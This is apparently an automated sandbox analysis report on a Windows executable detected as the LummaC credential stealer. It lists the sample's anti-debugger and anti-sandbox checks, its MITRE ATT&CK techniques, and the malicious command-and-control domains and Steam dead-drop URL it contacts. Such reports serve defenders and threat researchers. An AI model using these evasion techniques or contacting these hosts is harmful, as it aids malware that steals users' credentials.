    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84BDD8 second address: 84BDFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8E4CB125C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F8E4CB125D4h 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84BDFC second address: 84BE00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84BE00 second address: 84BE26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E4CB125D5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push esi 0x0000000d pushad 0x0000000e jnc 00007F8E4CB125C6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85366E second address: 853673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 853673 second address: 8536A3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8E4CB125CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F8E4CB125D5h 0x00000013 js 00007F8E4CB125C6h 0x00000019 popad 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FA0CA0 second address: 4FA0CA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FA0CA4 second address: 4FA0CAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FA0CAA second address: 4FA0CD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E4CE84C04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax+00000860h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8E4CE84BFAh 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FA0CD6 second address: 4FA0CDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FA0CDA second address: 4FA0CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FA0CE0 second address: 4FA0D4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 4AA32633h 0x00000008 pushfd 0x00000009 jmp 00007F8E4CB125D8h 0x0000000e add esi, 06C2D638h 0x00000014 jmp 00007F8E4CB125CBh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d test eax, eax 0x0000001f jmp 00007F8E4CB125D6h 0x00000024 je 00007F8EBE4A85F7h 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F8E4CB125D7h 0x00000031 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FA0D4D second address: 4FA0D53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB0F7A second address: 4FB0F8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E4CB125D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Tries to evade debugger and weak emulator (self modifying code)
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5C3DEB instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 76171D instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 761B09 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 772FE7 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7ECC98 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exe TID: 5336Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: C:\Users\user\Desktop\file.exeLast function: Thread delayed
    Source: file.exe, 00000000.00000002.2248484421.0000000000745000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
    Source: Amcache.hve.5.drBinary or memory string: VMware
    Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.5.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
    Source: file.exe, 00000000.00000002.2249509105.0000000001210000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2249509105.000000000122B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2249509105.00000000011AE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201946477.0000000001210000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201946477.000000000122B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.5.drBinary or memory string: vmci.sys
    Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.5.drBinary or memory string: VMware20,1
    Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
    Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: file.exe, 00000000.00000002.2248484421.0000000000745000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
    Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Hides threads from debuggers
    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
    Tries to detect sandboxes and other dynamic analysis tools (window names)
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A00D0 LdrInitializeThunk,0_2_005A00D0

    HIPS / PFW / Operating System Protection Evasion

    barindex
    LummaC encrypted strings found
    Source: file.exeString found in binary or memory: clearancek.site
    Source: file.exeString found in binary or memory: licendfilteo.site
    Source: file.exeString found in binary or memory: spirittunek.stor
    Source: file.exeString found in binary or memory: bathdoomgaz.stor
    Source: file.exeString found in binary or memory: studennotediw.stor
    Source: file.exeString found in binary or memory: dissapoiznw.stor
    Source: file.exeString found in binary or memory: eaglepawnoy.stor
    Source: file.exeString found in binary or memory: mobbipenju.stor
    Source: file.exe, file.exe, 00000000.00000002.2248790104.0000000000789000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
    Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation    		1
    DLL Side-Loading    		2
    Process Injection    		24
    Virtualization/Sandbox Evasion    		OS Credential Dumping641
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		11
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    PowerShell    		Boot or Logon Initialization Scripts1
    DLL Side-Loading    		2
    Process Injection    		LSASS Memory24
    Virtualization/Sandbox Evasion    		Remote Desktop ProtocolData from Removable Media1
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
    Deobfuscate/Decode Files or Information    		Security Account Manager2
    Process Discovery    		SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
    Obfuscated Files or Information    		NTDS223
    System Information Discovery    		Distributed Component Object ModelInput Capture114
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
    Software Packing    		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading    		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    file.exe34%ReversingLabsWin32.Infostealer.Tinba
    file.exe100%AviraTR/Crypt.TPM.Gen
    file.exe100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
    http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%URL Reputationsafe
    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%URL Reputationsafe
    http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://store.steampowered.com/points/shop/0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
    https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
    https://avatars.akamai.steamstatic0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
    https://store.steampowered.com/about/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english0%URL Reputationsafe
    https://help.steampowered.com/en/0%URL Reputationsafe
    https://store.steampowered.com/news/0%URL Reputationsafe
    http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en0%URL Reputationsafe
    https://store.steampowered.com/stats/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
    https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
    https://store.steampowered.com/legal/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=e0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl0%URL Reputationsafe
    http://upx.sf.net0%URL Reputationsafe
    https://store.steampowered.com/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english0%URL Reputationsafe
    http://store.steampowered.com/account/cookiepreferences/0%URL Reputationsafe
    https://store.steampowered.com/mobile0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&amp;l=engl0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/badges100%URL Reputationmalware

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    steamcommunity.com
    		104.102.49.254
    		truetrue
      		unknown
      sergei-esenin.com
      		104.21.53.8
      		truetrue
        		unknown
        eaglepawnoy.store
        		unknown
        		unknowntrue
          		unknown
          bathdoomgaz.store
          		unknown
          		unknowntrue
            		unknown
            spirittunek.store
            		unknown
            		unknowntrue
              		unknown
              licendfilteo.site
              		unknown
              		unknowntrue
                		unknown
                studennotediw.store
                		unknown
                		unknowntrue
                  		unknown
                  mobbipenju.store
                  		unknown
                  		unknowntrue
                    		unknown
                    clearancek.site
                    		unknown
                    		unknowntrue
                      		unknown
                      dissapoiznw.store
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        studennotediw.storetrue
                          		unknown
                          dissapoiznw.storetrue
                            		unknown
                            https://steamcommunity.com/profiles/76561199724331900true
                            • URL Reputation: malware
                            		unknown
                            eaglepawnoy.storetrue
                              		unknown
                              bathdoomgaz.storetrue
                                		unknown
                                clearancek.sitetrue
                                  		unknown
                                  spirittunek.storetrue
                                    		unknown
                                    licendfilteo.sitetrue
                                      		unknown
                                      mobbipenju.storetrue
                                        		unknown
                                        https://sergei-esenin.com/apitrue
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&ampfile.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://steamcommunity.com/?subsection=broadcastsfile.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://sergei-esenin.com/file.exe, 00000000.00000002.2249509105.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201867746.0000000001239000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2249509105.000000000122B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://store.steampowered.com/subscriber_agreement/file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6file.exe, 00000000.00000003.2201818657.000000000126C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.valvesoftware.com/legal.htmfile.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampfile.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngfile.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngfile.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackfile.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://community.akamai.steamstatic.cfile.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLfile.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPifile.exe, 00000000.00000003.2201818657.000000000126C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://eaglepawnoy.store:443/apiFfile.exe, 00000000.00000002.2249509105.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=wfile.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://licendfilteo.site:443/apifile.exe, 00000000.00000002.2249509105.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishfile.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
